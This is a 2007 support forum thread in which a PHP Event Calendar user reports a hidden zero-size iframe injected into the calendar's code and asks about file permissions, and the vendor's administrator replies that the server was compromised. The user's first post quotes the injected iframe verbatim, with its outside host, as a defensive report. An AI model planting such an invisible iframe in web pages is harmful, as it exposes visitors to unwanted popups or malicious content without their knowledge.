Support Forum Softcomplex logo
About Us  | Services  | Download  | Order  | Support  | |
| Search | Today's Posts | Stats | Board Rules | Not logged in [ Login | Register ]
 SoftComplex Forums » PHP Event Calendar » Security issue go to bottom
Last active: Never

Printable Version | Subscribe | Add to Favourites   Post new thread
Author: Subject: Security issue
oryhanen
Junior Member

Posts: 3
Registered: 5/9/2006
Member Is Offline
posted on 8/3/2007 at 11:35 AM Reply With Quote
Security issue
Hi

Again I have problems with o00o.info iframe, which has appeared in the beginning of the calendar code:
Code:
<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=soauker marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
It tries to open advertisement popups when I edit the events, for example.

What are the appropriate file permissions for the php event calendar files and folders so that the problem will not repeat again?

Is there any correction files for this problem? I tried to google the issue and I found that Joomla! had the same problem...
View User's Profile View All Posts By User U2U Member
tigra
Administrator

Posts: 1976
Registered: 6/17/2002
Location: US, CO
Member Is Offline
posted on 8/3/2007 at 02:57 PM Reply With Quote

somebody has gained access to your server. For calendar to work the server should have write permissions to the its configuration files. If somebody else can run their scripts on your server then can as well write to calendar's files. The venerability is not necessarily in the calendar's code or configuration. We can investigate the problem if you provide more information (i.e. web server's log with the malicious activity etc).
View User's Profile View All Posts By User U2U Member
oryhanen
Junior Member

Posts: 3
Registered: 5/9/2006
Member Is Offline
posted on 8/3/2007 at 08:23 PM Reply With Quote

Quote:
Originally posted by tigra
For calendar to work the server should have write permissions to the its configuration files...
... which are...?
View User's Profile View All Posts By User U2U Member
tigra
Administrator

Posts: 1976
Registered: 6/17/2002
Location: US, CO
Member Is Offline
posted on 8/4/2007 at 04:39 PM Reply With Quote

This depends on the ownership of the file (listed from the most conservative, to most permissive)
- if file belongs to the user web server runs under then 600 is enough - owner read/write
- if web server is in the group that file belongs to then 660 will do - owner and group read/write
- otherwise 666 (woooo.... =8-[]]] ) - all read/write
View User's Profile View All Posts By User U2U Member
Post new thread

Related Links:
Product Page
Product Demonstrations Live Demos
Free/Trial Script Download Free Download
Product Documentation Documentation
Documentation page
Change Log
Support Forum Support Forum
Order Now ORDER NOW!
Add to Cart
View Cart
 

 SoftComplex Forums  » PHP Event Calendar » Security issue Go To Top


Powered by XMB 1.9.1 Nexus
Developed By Aventure Media & The XMB Group © 2002-2004